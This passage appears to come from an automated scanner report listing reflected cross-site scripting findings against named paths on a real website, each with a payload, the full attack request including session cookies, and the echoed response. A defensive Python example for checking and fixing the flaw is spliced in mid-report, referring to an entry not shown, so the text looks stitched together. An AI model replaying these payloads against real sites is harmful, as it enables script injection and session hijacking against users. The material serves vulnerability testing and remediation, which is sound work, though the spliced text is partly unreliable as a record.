Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar6ed9e'><script>alert(1)</script>d07b7742900/js/fivestar.js'>
...[SNIP]...

1.259. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f4e8'><script>alert(1)</script>6f14cf79154 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/js7f4e8'><script>alert(1)</script>6f14cf79154/fivestar.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:27 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/js7f4e8'><script>alert(1)</script>6f14cf79154/fivestar.js'>
...[SNIP]...

1.260. http://www.lavasoft.com/mylavasoft/sites/all/modules/fivestar/js/fivestar.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/fivestar/js/fivestar.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload beed3'><script>alert(1)</script>9463b547838 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/fivestar/js/fivestar.jsbeed3'><script>alert(1)</script>9463b547838?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18226
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/fivestar/js/fivestar.jsbeed3'><script>alert(1)</script>9463b547838'>
...[SNIP]...

1.261. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 850d2'><script>alert(1)</script>c70be2247dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft850d2'><script>alert(1)</script>c70be2247dd/sites/all/modules/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang_code=US; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Set-Cookie: country_name=United+States; expires=Sun, 06-Nov-2011 12:37:22 GMT; path=/
Vary: Accept-Encoding
Content-Length: 10657
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv='Content-
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft850d2'><script>alert(1)</script>c70be2247dd/sites/all/modules/google_analytics/googleanalytics.js?w'>
...[SNIP]...

1.262. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ce65'><script>alert(1)</script>b37c89188f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites3ce65'><script>alert(1)</script>b37c89188f6/all/modules/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18288
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites3ce65'><script>alert(1)</script>b37c89188f6/all/modules/google_analytics/googleanalytics.js'>
...[SNIP]...

1.263. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee6ff'><script>alert(1)</script>31bf7d50746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/allee6ff'><script>alert(1)</script>31bf7d50746/modules/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:37:47 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:37:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/allee6ff'><script>alert(1)</script>31bf7d50746/modules/google_analytics/googleanalytics.js'>
...[SNIP]...

1.264. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e118'><script>alert(1)</script>e29be4ee5ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules5e118'><script>alert(1)</script>e29be4ee5ec/google_analytics/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:01 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules5e118'><script>alert(1)</script>e29be4ee5ec/google_analytics/googleanalytics.js'>
...[SNIP]...

1.265. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2797b'><script>alert(1)</script>45814a816fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/google_analytics2797b'><script>alert(1)</script>45814a816fe/googleanalytics.js?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910.1315417029.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSc599c32e3ce9314407d45ca956b2af18=fcpacfrs73dr4ehbr6r3559hv1

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:38:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:38:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 18250
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<a class='login first' href='/mylavasoft/login?destination=/mylavasoft/sites/all/modules/google_analytics2797b'><script>alert(1)</script>45814a816fe/googleanalytics.js'>
...[SNIP]...
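
The issue-detail paragraphs of entries 1.257 through 1.265 above all describe one sink: whatever path was requested is written, unencoded, into the single-quoted href of the login link on the 404 page, so a single quote in any path segment closes the attribute and the remainder of the probe is parsed as markup. The Python below is an added example, not code from the report or from the site. It rebuilds that link from a constructed template that mirrors the evidence lines (the real server-side code is not on the page), uses the standard-library HTML parser to confirm that the probe actually yields a script element rather than merely appearing in the response text, and shows the encoding that closes the hole. The function names, the "Login" link text and the sample path are assumptions.

```python
"""Verify attribute break-out from a reflected URL path, and the fix.

Added example, not part of the scanner report. The link template is
constructed to mirror the evidence lines in the report; the site's real
server-side code is not on the page.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote

# Probe string taken from entry 1.257: a quote to close the attribute,
# a '>' to close the tag, then a script element and a trailing marker.
PROBE = "6f8be'><script>alert(1)</script>ecb418fd4bc"


def vulnerable_login_link(request_path: str) -> str:
    """Assumed template for the sink seen in the report: the request path
    is dropped unmodified into a single-quoted href."""
    return (f"<a class='login first' "
            f"href='/mylavasoft/login?destination={request_path}'>Login</a>")


def hardened_login_link(request_path: str) -> str:
    """Same link with two layers of encoding: the path is percent-encoded as
    a URL component (quote, '/' kept), then the whole attribute value is
    HTML-escaped with quote=True so that ' and " cannot end the attribute."""
    destination = quote(request_path, safe="/")
    href = f"/mylavasoft/login?destination={destination}"
    return f"<a class='login first' href='{escape(href, quote=True)}'>Login</a>"


class _TagCollector(HTMLParser):
    """Record every start tag and every <a href> the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.hrefs: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value is not None:
                    self.hrefs.append(value)


def _parse(fragment: str) -> _TagCollector:
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector


def probe_reflected_verbatim(body: str, probe: str = PROBE) -> bool:
    """The scanner's own heuristic: the probe appears unmodified in the body."""
    return probe in body


def script_injected(fragment: str) -> bool:
    """Context check: does parsing the fragment produce a <script> element?
    A verbatim reflection inside a properly encoded attribute would not."""
    return "script" in _parse(fragment).tags


def parsed_href(fragment: str) -> str:
    """The href value a browser-like parser assigns to the first <a>."""
    hrefs = _parse(fragment).hrefs
    return hrefs[0] if hrefs else ""


if __name__ == "__main__":
    # Sample path constructed from the request in entry 1.257.
    path = f"/mylavasoft/sites/all/modules{PROBE}/fivestar/js/fivestar.js"
    for label, link in (("vulnerable", vulnerable_login_link(path)),
                        ("hardened", hardened_login_link(path))):
        print(f"{label}: reflected={probe_reflected_verbatim(link)} "
              f"script={script_injected(link)} href={parsed_href(link)!r}")
```

The hardened variant's href keeps the full original path (percent-encoded), so the login redirect still works, while the parser sees only the anchor. Checking the parse result rather than a substring is the distinction between "input is echoed" and "input is executed", which is what separates a High/Certain finding from noise.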

1.266. http://www.lavasoft.com/mylavasoft/sites/all/modules/google_analytics/googleanalytics.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lavasoft.com
Path:   /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b300'><script>alert(1)</script>e4786235842 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mylavasoft/sites/all/modules/google_analytics/googleanalytics.js7b300'><script>alert(1)</script>e4786235842?w HTTP/1.1
Host: www.lavasoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lavasoft.com/mylavasoft/login?destination=/?domain=4b22e
Cookie: PHPSESSID=jhrks61jjsbq0dqo2c261lpq80; lang_code=US; country_name=United+States; __utma=105290910.12430102.1315417029.1315417029.1315417029.1; __utmb=105290910.1.10.1315417029; __utmc=105290910; __utmz=105290910<